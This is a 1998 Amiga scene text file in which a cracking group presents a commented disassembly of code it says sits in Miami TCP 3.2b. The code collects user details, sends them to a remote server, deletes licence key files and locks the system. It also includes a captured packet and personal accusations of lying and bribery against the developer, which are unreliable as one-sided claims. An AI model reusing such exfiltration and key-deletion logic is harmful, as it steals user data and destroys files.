Preview
___(\·----------------------- ---- --- -- - - -
\) IN A WORLD OF DREAMS - IN A WORLD OF PASSION
THIS FILE DECIDED TO PASS ONE OF THE LAST AND REAL
BULLETIN BOARD SYSTEMS IN CENTRAL EUROPE
THE ONLY WAY TO SURVIVE - FAITH! (\ ___
- - --- --- ------- ----------------------·\)
/\
/ \ ____
___________ __________ / \\ ____________/ |______
___\____ \_ __|__/__ \\/ _/ |_ |
.--- -| / / _| / \\ | _/ |- ---.
| |______________/_______________\ \\_________| |______| |
| / \\÷e÷ /________| |
| /______________\ |
| _________ |
| _____________ ___________ _______|_ / |
| ___\____ / \ / | |
`--------- -| _/ _/_ | \ _/\ |- --------------'
|______\ /_____________/______________|
\ /
\ / sTAFF:
\ /
\/ SHADOWER,AUTOPSY,EXOCET,
LINEBACKER,FURY,NIGHT ASSASSIN
HOODLUM WHQ! · DELIRIUM WHQ! · ARCLITE WHQ! · SNEAKERS WHQ!
DIGITAL CORRUPTION USHQ! · LIGHTFORCE USHQ! · NUT&BOLT WHQ!
·SINCE 1992·
@BEGIN_FILE_ID.DIZ ________| ____ __|_________|___
dC! | _ \_ |/ |/ |_ _/ ._ | | zS!sE
_ | / / / |_ / |/ | |/ | |_ _
\\ |____/ \___/ \___| |__/ |_____| //
|¯ \____| \___| \____| \_____| ¯|
| · C Ø R R U P T ¡ Ø N ¹ 9 9 8 ! · |
| |
| Amiga Internet Users Security Warning |
| Miami has a serious user security breach |
|_ and the culprit is Holger Kruse. _|
//.11.12.98._____________________.DC`98.\\
@END_FILE_ID.DIZ
We decided without further delays that it was about time to give people some
ABSOLUTE proof regarding the "rumoured" information sending built into Miami
TCP. Every detail discussed below refers ONLY to the distribution archive of
Miami 3.2b available from www.nordicglobal.com (exe size 389656 (020))
There has been a lot of talk about this in the past, however until now nobody
has provided users with REAL PROOF that will allow EVERY SINGLE Miami user to
ask themselves if they find this kind of behaviour in a TCP stack on an Amiga
acceptable. It simply CANNOT be denied now. REGARDLESS of the circumstances
that trigger the below procedure, it is our belief, and the belief of MANY
other Amiga internet users that this procedure is simply no more than
a glorified trojan horse, and should even be classified as such in future
virus killers.
The plain and simple facts ARE that Miami sends your username, IP, DNS, real
name (if entered in), registration name, licence number and email address
(if possible) to Holgers server. It also signals another process using an
interprocess port to delete various keys around the users system if
certain conditions are true. Then it kindly locks down your system ensuring
that you loose any unsaved work in memory.
Digital Corruption now states unequivocally that Holger Kruse has coded into
Miami TCP a mechanism which sends to him information on the Miami user, of
which he compiles a database.
Below is reasonably commented (not to the point of stupidness) resource of
Miami's info sending mechanism that Holger Kruse has denied exists on at
least one occasion, on another occasion he claimed Miami does not lock
up, and yet again he has claimed the deletion of key files does not happen.
Also below is a full description of the outgoing data and also an actual
captured packet from Miami en route to h1.nordicglobal.com.
Some level of understanding of simple Motorola assembly language and
workings of the Amiga OS is assumed, but even a less knowledgable
user should be able to get the drift of the information contained below.
Regarding the key deletion system, various keyfiles are searched for
and then a procedure is called which signals another procedure via
PutMsg() etc and as a result another procedure carries out the removal
of keyfiles. Just before the system lockdown there is a small delay, this
is to allow DOS to finish with deleting the keys (after all its being
handled by another process) before locking down. If lockdown occurs
before DOS has finished deleting , the result would be an invalidated
or worse Harddrive.
Regarding the lockdown, this is simple to see and cant be denied. Holger
calls Disable() and then throws Miami into an unexitable loop.
Regarding the actual information sending, its clear to see where the
information is compiled and moved into an area ready for sending. Its
also clear to see the references to Holgers server and finally the
Socket() and SendTo() calls.
With such PLAIN evidence that Holger Kruse has been lying and coding
in trojan send routines into Miami, it remains to be seen whether
he will continue to blame DC in an attempt to divert attention from
his code, or whether finally he will admit he offered a bribe to DC
to remain quiet, admit he locks down systems, admit he receives
clandestine user information, and admit he deletes keys off peoples
systems. Time will tell, but once a liar always a liar.
In conclusion, the discussion of "is there any such thing in Miami" is
now WELL AND TRUELY closed. Anybody even bothering to discuss and question
this after seeing the information below is either an idiot, a fanatic or
a liar.
Holger Kruse, consider yourself exposed.
Digital Corruption 98.
-----------------------------------------------------------------------------
DECOMPILED CODE SEGMENT FROM MIAMI 3.2B DISTRIBUTION FROM WWW.NORDICGLOBAL.COM
STARTING FROM OFFSET $13326
*** NOTE the label endless_loop for proof of lock ups.
procedure violate_users_privacy is responsible for sending out the information
and we encourage anybody reading this to skip down to that procedure labelled
below and read through the commenting.
...
nordicglobal: dc.l $1002704C ;704C = port 28748
dc.l $CDA0F929 ;h1.nordicglobal.com
dc.l 0 ;205.160.249.41
dc.l 0
Miami.MSG0: dc.b 'Miami:',0,0
Miamikey1.MSG: dc.b 'Miami.key1',0,0
Miamikey2.MSG: dc.b 'Miami.key2',0,0
S.MSG0: dc.b 'S:',0,0
PPPkey.MSG: dc.b 'PPP.key',0
X11.MSG: dc.b 'X11:',0,0
AmiWinkey.MSG: dc.b 'AmiWin.key',0,0
packet_header: dc.b '$MPRNFY1',0,0 ;for remote server logging
REPLYTO: dc.b 'REPLYTO',0 ;env. variable to get info from
KillKeyFiles:
SUB.W #$44,SP
MOVEM.L D2/D6/D7/A2/A3/A5/A6,-(SP)
SUB.L A1,A1
MOVE.L execbase-DT(A4),A6
JSR _LVOFindTask(A6)
MOVE.L D0,A5
JSR _LVOCreateMsgPort(A6)
MOVE.L D0,A3
TST.L D0
BEQ lbC013446
MOVEQ #-1,D0
MOVE.L $B8(A5),A2
MOVE.L D0,$B8(A5)
LEA Miami.MSG0(PC),A0
MOVE.L dosbase-DT(A4),A6
MOVEQ #-2,D2
MOVE.L A0,D1
JSR _LVOLock(A6) ; get a lock on the Miami: dir.
MOVE.L D0,D7
BEQ.S lbC0133CC
MOVE.L D7,D1
JSR _LVOCurrentDir(A6)
PEA Miamikey1.MSG(PC) ; look for Miami.key1
MOVE.L D0,D6
MOVE.L D7,-(SP)
MOVE.L A3,-(SP)
PEA $28(SP)
BSR lbC013230 ; delete it!
PEA Miamikey2.MSG(PC) ; look for Miami.key2
MOVE.L D7,-(SP)
MOVE.L A3,-(SP)
PEA $38(SP)
BSR lbC013230 ; delete it too!
LEA $20(SP),SP
MOVE.L D6,D1
JSR _LVOCurrentDir(A6)
MOVE.L D7,D1
JSR _LVOUnLock(A6) ; release the lock on Miami:
lbC0133CC: LEA S.MSG0(PC),A0
MOVE.L A0,D1
JSR _LVOLock(A6) ; get a lock on the S: dir
MOVE.L D0,D7
BEQ.S lbC013402
MOVE.L D7,D1
JSR _LVOCurrentDir(A6)
PEA PPPkey.MSG(PC) ; look for PPP.key
MOVE.L D0,D6
MOVE.L D7,-(SP)
MOVE.L A3,-(SP)
PEA $28(SP)
BSR lbC013230 ; delete it!
LEA $10(SP),SP
MOVE.L D6,D1
JSR _LVOCurrentDir(A6)
MOVE.L D7,D1
JSR _LVOUnLock(A6)
lbC013402: LEA X11.MSG(PC),A0
MOVE.L A0,D1
JSR _LVOLock(A6) ; get a lock on X11: dir
MOVE.L D0,D7
BEQ.S lbC013438
MOVE.L D7,D1
JSR _LVOCurrentDir(A6)
PEA AmiWinkey.MSG(PC) ; look for AmiWin.key
MOVE.L D0,D2
MOVE.L D7,-(SP)
MOVE.L A3,-(SP)
PEA $28(SP)
BSR lbC013230 ; delete it!
LEA $10(SP),SP
MOVE.L D2,D1
JSR _LVOCurrentDir(A6)
MOVE.L D7,D1
JSR _LVOUnLock(A6)
lbC013438: MOVE.L A2,$B8(A5)
MOVE.L execbase-DT(A4),A6
MOVE.L A3,A0
JSR _LVODeleteMsgPort(A6)
lbC013446: MOVEM.L (SP)+,D2/D6/D7/A2/A3/A5/A6 :clean up and return
ADD.W #$44,SP
RTS
violate_users_privacy:
SUB.W #$100,SP
LEA nordicglobal(PC),A0 ;ptr to IP address to send to
LEA $F0(SP),A1 ;which is h1.nordicglobal.com
MOVE.L (A0)+,(A1)+ ;(CDA0F929=205.160.249.41)
MOVE.L (A0)+,(A1)+
MOVE.L (A0)+,(A1)+
MOVE.L (A0)+,(A1)+
LEA packet_header(PC),A0 ;$MPRNFY1 - Miami PiRate ideNtiFY 1 (?)
LEA $34(SP),A1 ;probably used so remote server knows
MOVE.L (A0)+,(A1)+ ;to log this packet
MOVE.L (A0)+,(A1)+
LEA licence_code-DT(A4),A0 ;Hashed Miami licence code
LEA $3C(SP),A1
MOVE.L (A0)+,(A1)+
LEA licence_dec-DT(A4),A0 ;20 Digit Miami licence code
LEA $40(SP),A1 ;in decimal form
MOVE.L (A0)+,(A1)+
MOVE.L (A0)+,(A1)+
MOVE.L (A0)+,(A1)+
MOVE.L (A0)+,(A1)+
MOVE.L (A0)+,(A1)+
LEA reg_name-DT(A4),A0 ;Gets the name of the user from
LEA $54(SP),A1 ;the Miami keyfiles information
MOVE.L (A0)+,(A1)+ ;Here Miami gets your name and
MOVE.L (A0)+,(A1)+ ;adds it into the packet just
MOVE.L (A0)+,(A1)+ ;after your licence code
MOVE.L (A0)+,(A1)+
LEA TCPIP_name-DT(A4),A0 ;TCP/IP Real Name information
LEA $64(SP),A1 ;this part is responsible for
MOVE.L (A0)+,(A1)+ ;adding your "real name" setting
MOVE.L (A0)+,(A1)+ ;in Miami TCP/IP into the packet
MOVE.L (A0)+,(A1)+ ;destinated for Holger
MOVE.L (A0)+,(A1)+
LEA TCPIP_user-DT(A4),A0 ;Right here is where your
LEA $74(SP),A1 ;username in TCP/IP settings is
MOVE.L (A0)+,(A1)+ ;added into the outgoing packet
MOVE.L (A0)+,(A1)+
MOVE.L (A0)+,(A1)+
MOVE.L (A0)+,(A1)+
LEA login_name-DT(A4),A0 ;Your ISP login/username is snared
LEA $84(SP),A1 ;right here
MOVE.L (A0)+,(A1)+
MOVE.L (A0)+,(A1)+
MOVE.L (A0)+,(A1)+
MOVE.L (A0)+,(A1)+
CLR.L -(SP)
BSR lbC013590 ;Call a subroutine to get a pointer
ADDQ.W #4,SP ;to various current session details
MOVE.L D0,A0 ;(IP, DNS etc)
LEA 8(A0),A1
LEA $94(SP),A0 ;Adds your current IP address
MOVE.L (A1)+,(A0)+ ;into the outgoing information
MOVE.L D0,A5
LEA 12(A5),A0
LEA $98(SP),A1 ;Add in your primary DNS server IP
MOVE.L (A0)+,(A1)+
LEA REPLYTO(PC),A0 ;Here we get ready to make an OS call
MOVEQ #0,D4 ;in order to get information stored
MOVEQ #$30,D3 ;(if any) in the env. variable 'REPLYTO'
MOVE.L A0,D1 ;which would be your email reply address
LEA 3(SP),A0 ;(if your mailer uses this or is set up
MOVE.L A0,D2 ;this way)
MOVE.L dosbase-DT(A4),A6
JSR _LVOGetVar(A6) ;Calls GetVar() and returns pointer
TST.L D0 ;to your info stored in $REPLYTO
BLE.S no_email_var ;any replyto email? if not miss some stuff
MOVE.L D2,A0
LEA $9C(SP),A1
MOVEQ #$30,D0
BSR lbC018072 ;copies contents of the env.var to the
;outgoing packet area.
(copystring proc)
BRA.S was_email_var
no_email_var:
CLR.W $9C(SP) ;zeros first word of area of packet that
;contains replyto if no email var set.
was_email_var:
MOVE.L miami_verstring(A4),A0 ;adds the version string of the Miami
LEA $CC(SP),A1 ;being used into the packet to be
MOVEQ #$20,D0 ;sent. Something like:
;$VER: Miami 3.0a (06.03.98)
BSR lbC018072 ;call string copy to copy in $VER:
MOVEQ #4,D1
MOVE.L $104(SP),D0
MOVE.W D0,$EC(SP)
CLR.W $EE(SP)
LEA $3C(SP),A5 ;pointer to start of packet data
;to crypt. Why the cryption if this
;is so "above board"?
;doesnt crypt '$MPRNFY1' as thats
;used by the remote server as a
;way of identifying what this packet
;is for (sending your info).
crypto:
MOVE.W -2(A5),D0 ;Encode the outgoing data using
ADDQ.L #1,D1 ;progressive ADD.w
ADD.W D0,(A5)
ADDQ.L #2,A5
MOVEQ #$5E,D0
CMP.L D0,D1
BLT.S crypto ;continue cryption whilst necessary
MOVEQ #2,D0
MOVEQ #0,D2
MOVE.L D0,D1
MOVE.L bsdbase-DT(A4),A6
JSR _LVOSocket(A6) ;Initialize a socket for sending
MOVEQ #$5E,D1
MOVEQ #$10,D3 ;length of tolen (sockaddr)
ADD.L D1,D1 ;d1=length of data to send
;(which is 188 bytes)
LEA $34(SP),A0 ;PTR to data that was initialized above.
;i.e starting with $MPRNFY1 which is
;CLEARLY moved into this memory area
;which is about to be sent to Holger,
;followed by all the other information!
LEA $F0(SP),A1 ;PTR to struct sockaddr
JSR _LVOSendTo(A6) ;SendTo() - You have now been violated.
;This is the call that sends all the
;information that has been compiled
;to Holgers server. Its clear to see
;that the destination is in fact
;h1.nordicglobal.com and the data
;sent is all the data that was prepared
;above
;PTR to data = $34(SP) = start of info
;PTR to sockaddr = $F0(SP) = clearly
;addressing h1.nordicglobal.com
BSR KillKeyFiles ;Lets kil the users keys now
MOVEQ #$5A,D1
ADD.L D1,D1
MOVE.L dosbase-DT(A4),A6 ;give DOS time to finish deleting
JSR _LVODelay(A6) ;all the keyfiles!
BSR cripplesystem
endless_loop:
BRA.S endless_loop ;And here it is...a nice infinite
;loop after a Disable()
;Net result = system lockup.
cripplesystem:
MOVE.L A6,-(SP)
MOVE.L execbase-DT(A4),A6
JSR _LVODisable(A6) ;disable interrupt processing
;or simply speaking...
;this stops the machine doing anything
;other than run this task, i.e. shuts
;down all system functions, multitasking
;etc...the lot, until an Enable() is
;called.
MOVE.L (SP)+,A6
RTS
-----------------------------------------------------------------------------
Information on the outgoing packet :
The information sent to h1.nordicglobal.com is 188 bytes in length and
is made up as follows...
Offset $00 : contains the string '$MPRNFY1' ( 8 bytes)
Offset $08 : hashed Miami licence code ( 4 bytes)
Offset $0C : Miami licence code in decimal form ( 20 bytes)
Offset $20 : Name of registered user from keyfiles ( 16 bytes)
Offset $30 : Real name from Miami TCP settings ( 16 bytes)
Offset $40 : User name from Miami TCP settings ( 16 bytes)
Offset $50 : users ISP login ( 16 bytes)
Offset $60 : Current IP address (longword form) ( 4 bytes)
Offset $64 : Primary DNS server (longword form) ( 4 bytes)
Offset $68 : Contents of REPLYTO env. variable ( 48 bytes)
Offset $98 : Current Miami $VER: string ( 32 bytes)
Offset $B8 : 2 bytes of something ( 2 bytes)
Offset $BA : last 2 bytes are blanked ( 2 bytes)
TOTAL 188 bytes
-----------------------------------------------------------------------------
Below is an actual captured packet (minus some critical information removed)
from the infromation send mechanism coded into Miami:
Miami Packet:
flags =$00000000
itype =$01
ptype =$00
data =$101F77A8
length =$000000D8
INET Packet:
ip_v = $45 ip_tos = $00
ip_len = $00D8 ip_id = $91BF ip_off = $0000
ip_ttl = $33 ip_p = $11 ip_sum = $9DF2
ip_src = xxx.xxx.xxx.xxx ; source IP
ip_dst = 205.160.249.41 ; 205.160.249.41 (cd a0 f9 29)
th_sport = 1029 th_dport = 28748 ; "h1.nordicglobal.com"
th_seq = $00C4C8D8 th_ack = $244D5052
th_off = $4E th_flags = $46
th_win = $5931 th_sum = $C96C
th_urp = $E01B
00B0
0000: 134B 457B 75AB AEDD E013 1144 4476 7CA9 '.KE{u......DDv|.'
0010: B1DC E414 2C79 9EE6 0054 209B 8A00 FC65 '....,y...T ....e'
0020: 6AD8 6B28 6B8C D8F5 475E BAD2 2D33 A1A2 'j.k(k...G^..-3..'
0030: 13A2 13A2 1411 8385 8385 8385 8385 8385 '................'
0040: 8385 8385 XXXX XXXX D155 D155 D155 D155 '......cU.U.U.U.U'
0050: D155 D155 XXXX XXXX XXXX XXXX 0785 0805 '.U.U._.x........'
0060: 700A E1BE 49D5 CCB5 34D5 DE39 DE39 DE46 'p...I...4..9.9.F'
0070: 4646 68D2 68D2 6952 D155 56E9 BF09 686D 'FFh.h.iR.UV...hm'
0080: D070 5734 BF54 68D8 D0F8 8890 ACE6 F238 '.pW4.Th........8'
0090: 2C58 79C1 DB2E 444E 777C A7DD C805 F83B ',Xy...DNw|.....;'
00A0: 266B 5999 92D1 BBD1 FF40 6FB9 6FB9 6FB9 '&kY......@o.o.o.'
INET Options:
IAC
Packet:
00D8
0000: 4500 00D8 91BF 0000 3311 9DF2 CB0A 5019 'E.......3.....P.'
0010: CB16 7129 0405 704C 00C4 C8D8 244D 5052 '..q)..pL....$MPR'
0020: 4E46 5931 C96C E01B 134B 457B 75AB AEDD 'NFY1.l...KE{u...'
0030: E013 1144 4476 7CA9 B1DC E414 2C79 9EE6 '...DDv|.....,y..'
0040: 0054 209B 8A00 FC65 6AD8 6B28 6B8C D8F5 '.T ....ej.k(k...'
0050: 475E BAD2 2D33 A1A2 13A2 13A2 1411 8385 'G^..-3..........'
0060: 8385 8385 8385 8385 8385 8385 XXXX XXXX '..............cU'
0070: D155 D155 D155 D155 D155 D155 XXXX XXXX '.U.U.U.U.U.U._.x'
0080: XXXX XXXX 0785 0805 700A E1BE 49D5 CCB5 '........p...I...'
0090: 34D5 DE39 DE39 DE46 4646 68D2 68D2 6952 '4..9.9.FFFh.h.iR'
00A0: D155 56E9 BF09 686D D070 5734 BF54 68D8 '.UV...hm.pW4.Th.'
00B0: D0F8 8890 ACE6 F238 2C58 79C1 DB2E 444E '.......8,Xy...DN'
00C0: 777C A7DD C805 F83B 266B 5999 92D1 BBD1 'w|.....;&kY.....'
00D0: FF40 6FB9 6FB9 6FB9 '.@o.o.o.'
-----------------------------------------------------------------------------
________ __________ ________ ________ _____ __
_ __ \_ _ ¬\ \_ _ ¬\ \_ _ ¬\ \_ _ ¬\ \_ Y ¬\ __ _
) _\__Y ·\ / Y____/ / Y ·\ / Y ·\ / ! \ (
/ / | \\ // ___/__ / _ \\\___| \\ // _ \ \
__/ / ! /· Y ¬/ Y \ | /· Y \ \__
\_ \_ ________\_ ________\_ __!_____/ !_ __\_ __!_____/ _/
\_ \/ \/ \/ \/ \/ _/
\ __ _ __________ ________ _____ _ _ __ /
Y \_ _ ¬\ \_ _ ¬\ \_ ¡ ¡ \ Y
· _ __ / Y __/ / Y \ / |_| \ __ _ ·
/ // _ ¬\ // | \ // | | \ \
(_ /· Y /· ! /· ! ! \ _)
\ \_ __!_____\_ ________\_ _________/ /
_) \/ \/ \/·$· (_
\ ___ _ _ ___ /
(_ _/ \_ _)
\ _) SYSOP: SHADOWER! (_ /
\/ \/
HOODLUM WHQ! · DELIRIUM WHQ! · ARCLITE WHQ! · SNEAKERS WHQ!
DIGITAL CORRUPTION USHQ! · LIGHTFORCE USHQ! · NUT&BOLT WHQ!
·SINCE 1992·
[A¡RaDDer v3.4 By A¡Rcø]
____
JØØØØ,
ÍØØØØØ UL: case DATE: 12/11/98 TIME: 22:20
#ØØØØ
__óØØØØ,____ ·
_ææØØØØØØØØØØØØØØæ=_ ¦
__ØØØØØØØØØØØØØØØØØØØØØm - -·» .oOo. «·---:- - - .....
,ÆØØØØØØØØØØØØØØØØجØØØØØØ# ¦ : :...
ØØØØØØØÆ ØØØØØØØØ# °ØØØØØ | :......:
ØØØØØØØØØ,ØØØØØØØØØøØØØØ@ _ _ | _ _ ...... _
°4ØØØØØØØØØØØØØØØØØØØØ° _/\\____ _/\\____ __/\\___ _/\\_____: :_/\\____
¬°^^¤0ØØØØØØØØØØØ@´ (_ .___))(_ ))(_ ____))(_ )) (_ .___))
¶ØØØØØØØØØØL / ¦ \\ / ¦ \\ /__. \\ / : : \\ :/ ¦ \\
____ ØØØØØØØØØØØ /:. | ///:. : ///:. | ///:.¦ ¦ // /:. | //
\ / ¥ØØØØØØØØØØL \____ // \____ // \____ // \__|__| //: \____ //
___\/___ øØØØØØ`ØØØØØ, \// \// \// \// : :[c!]\//
\ /\ / ØØØØØØ ¬ØØØØ# ¯ ¯ | ¯ ¯ : : ¯
\/ \/ ØØØØØØ ØØØØØ_ : : :
ÆØØØØØØ ¬ØØØØØ ÷ C·O·S·M·I·C >·< T·R·A·N·C·E ÷ : : ÷ BBS ÷
·FAITH!· ØØØØØØØ ØØØØØ# : : :
jØØØØØØQ ØØØØØظ | .: :....
ØØØØØØØØ ¶ØØØØØ# | :.........:
.ØØØØØØØØ |ØØØØØØ& _ _ _.__ __
ÆØØxCzØØØ `ØØØØØØع |_/__\//\____________________ __ _
ØØØØØØØØØ ØØØØØØØ#_¸ : \/
.øØØØØØØ^°°' `¯¬¯`^¤0Øع
~^^°°¯
[ SAD^MULTICHECK © 1995-96 GraveDancer/Sad^P! - Reg2: UNREGISTERED ]
/ \
·/(_____ sPEEEEEEEED aND fRIENDS ONlY! _____)\·
/ \
fILE pASSED tHE L.E.BBS
\ _____ _____ /
·\( sPEEEEEEEED aND fRIENDS ONlY! )/·
\ /
_____
_( /_________
\ _ /---| ____ _____
·-\----)_______/ |______\_ )__ _____ _\ /______
|_____| _ /_\ __/_______/_ _/ _/__
`-------/___/____\ /--\_________/
/ /---------·
/ b l a c k _____ a r t s .. \
/ _______\_ )__ _____ _____ \
·-/------- \ _ /__\ _ ))_ _| /_ ___ ---\-
·ave'bm ·-----/_____/ / /_\ _/_( _/____
`------\______\|___|_\__ )_
/________/